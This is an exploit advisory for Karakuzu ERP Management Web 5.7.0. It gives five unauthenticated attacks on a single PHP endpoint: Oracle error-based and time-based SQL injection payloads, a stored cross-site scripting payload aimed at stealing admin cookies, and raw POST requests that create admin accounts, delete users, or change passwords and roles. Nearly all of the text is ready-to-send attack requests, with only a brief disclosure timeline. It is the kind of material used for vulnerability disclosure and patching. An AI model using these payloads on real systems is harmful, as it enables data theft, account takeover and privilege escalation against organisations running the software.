Karakuzu ERP Management Web 5.7.0 SQL Injection

`# Exploit Title: Karakuzu ERP Management Web 5.7.0 - 'k_adi_duz' SQL Injection  
# Discovery Date: 2019-09-20  
# Exploit Author: Hakan TAŞKÖPRÜ  
# Vendor Homepage: http://karakuzu.info/  
# Effected Version <= 5.7.0  
  
Vulnerability #1: Unauthenticated SQL Injection  
==================================================  
  
Type: Error-based  
Title: Oracle AND error-based - WHERE or HAVING clause (CTXSYS.DRITHSX.SN)  
Payload: k_adi_duz=USERNAME' WHERE 4964=4964 AND  
1355=CTXSYS.DRITHSX.SN(1355,(CHR(113)||CHR(118)||CHR(118)||CHR(113)||CHR(113)||(SELECT  
(CASE WHEN (1355=1355) THEN 1 ELSE 0 END) FROM  
DUAL)||CHR(113)||CHR(120)||CHR(118)||CHR(118)||CHR(113)))--  
DhDH&k_yetki_duz=USER&kullanici_duzenle=  
  
Type: Time-based blind  
Title: Oracle AND time-based blind  
Payload: k_adi_duz=USERNAME' WHERE 8074=8074 AND  
6437=DBMS_PIPE.RECEIVE_MESSAGE(CHR(122)||CHR(90)||CHR(65)||CHR(88),5)--  
VuHD&k_yetki_duz=USER&kullanici_duzenle=  
  
POST /TARGET_PATH/netting/islem2.php HTTP/1.1  
Host: TARGET  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Content-Type: application/x-www-form-urlencoded  
  
k_adi_duz=[HERE]&k_email_duz=[HERE]&k_grup_duz=[HERE]&k_yetki_duz=[HERE]&k_sifre_duz=[HERE]&kullanici_duzenle=  
Description: k_adi_duz, k_email_duz, k_grup_duz, k_yetki_duz and  
k_sifre_duz parameters are injectable/vulnerable.  
  
Vulnerability #2: Unauthenticated Stored Cross Site Scripting in User  
Management Panel  
=======================================================================================  
Description : An attacker can stole an admin’s cookie.  
POST /TARGET_PATH/netting/islem2.php HTTP/1.1  
Host: TARGET  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Content-Type: application/x-www-form-urlencoded  
  
k_adi=VULN_USERNAME&k_email=VULN+EMAIL" onfocus="alert(1)"  
autofocus="&k_grup=TEST&k_yetki=ROOT&k_sifre=PASSWORD&kullanici_kayit=  
  
Vulnerability #3: Unauthenticated Creating Admin User  
======================================================  
Description : An attacker can create an admin or normal account.  
  
Request:  
  
POST /TARGET_PATH/netting/islem2.php HTTP/1.1  
Host: TARGET  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Content-Type: application/x-www-form-urlencoded  
k_adi=VULN_USERNAME&k_email=VULN+EMAIL&k_grup=TEST&k_yetki=ROOT&k_sifre=PASSWORD&kullanici_kayit=  
  
Vulnerability #4: Unauthenticated Deleting User  
=============================================  
Description : An attacker can delete an admin or normal account.  
  
POST /TARGET_PATH/netting/islem2.php HTTP/1.1  
Host: TARGET  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Content-Type: application/x-www-form-urlencoded  
  
kullanici_sil=k_adi_duz=USERNAME_TO_DELETE  
  
Vulnerability #5: Unauthenticated Editing User  
===============================================  
Description : An attacker can change a user’s password or role(e.g ROOT).  
POST /TARGET_PATH/netting/islem2.php HTTP/1.1  
Host: TARGET  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Content-Type: application/x-www-form-urlencoded  
k_adi_duz=USERNAME&k_email_duz=VULN+MAIL&k_grup_duz=GROUP&k_yetki_duz=ROOT&k_sifre_duz=NEW_PASSWORD&kullanici_duzenle=  
  
### History  
=============  
2019-09-20 Issue discovered  
2019-11-19 Vendor contacted (No response)  
2020-01-03 Issue published  
`